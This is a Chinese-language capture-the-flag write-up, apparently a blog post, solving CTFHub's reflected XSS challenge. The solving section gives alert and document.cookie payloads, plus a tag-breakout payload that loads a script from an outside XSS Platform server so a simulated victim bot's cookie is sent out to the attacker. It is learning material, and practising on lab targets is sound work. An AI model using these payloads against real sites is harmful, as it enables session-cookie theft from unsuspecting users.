CTFHub | 反射型

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

反射型:

        (无)

 网页显示内容

        

        

0x02 解题过程

检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。一般情况下,在一个网页中有一个输入框并且带有一个提交表单的,就有可能含有 XSS 漏洞。

        

直接使用 scripts 标签写入一个警告弹窗,警告内容自定义。

<script>alert("flag")</script>

        

点击提交表单按钮,发现成功跳出警告弹窗,说明此题存在 XSS 漏洞。

        

验证存在 XSS 漏洞后,使用 document.cookie 语句在弹窗和控制台中输出当前网页包含的所有 cookie 。

<script>alert(document.cookie);console.log(document.cookie);</script>

        

点击提交后,弹窗显示为空。检查网页源代码发现 script 标签被正常执行到 html 页面中。

<div>
    <h1>Hello, <script>alert(document.cookie);console.log(document.cookie);</script>
    </h1>
</div>

        

这说明 XSS 攻击通常需要使用一个服务器去接收参数,那么这里使用 XSS Platform 平台来接收。根据提示,将第一行代码植入到怀疑出现 xss 的地方(注意'的转义)。

</textarea>'"><script src=http://xxx.xxx.xxx.xxx/Q7yYOv?1702702862></script>

关于 XSS Platform 平台搭建的方法: 保姆级 | XSS Platform环境搭建-CSDN博客

         

在第一行输入框中使用 XSS Platform 平台中的代码,先执行 XSS 漏洞攻击。

        

第二个输入框则是用了模拟目标网站用户模拟点击受污染的 URL 链接,如果点击了这个链接,那么刚刚注入的 XSS 代码将会被执行并传递到本地服务器中。

        

访问 XSS Platform 平台,检查 cookie 参数是否传递到本地服务器中。检查发现此题 flag 。

        

        

0x03 XSS反射型

XSS反射型攻击流程图

        

        XSS反射型攻击一般伪装成合法的 URL 链接诱导用户点击。点击后,这个网页的 XSS 漏洞将会被执行,而恶意代码将会在用户的浏览器中执行,并返回参数给攻击者的服务器。关于 XSS 反射型攻击也类似于钓鱼攻击,因为攻击者一般会伪装成可信的实体来欺骗用户。

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值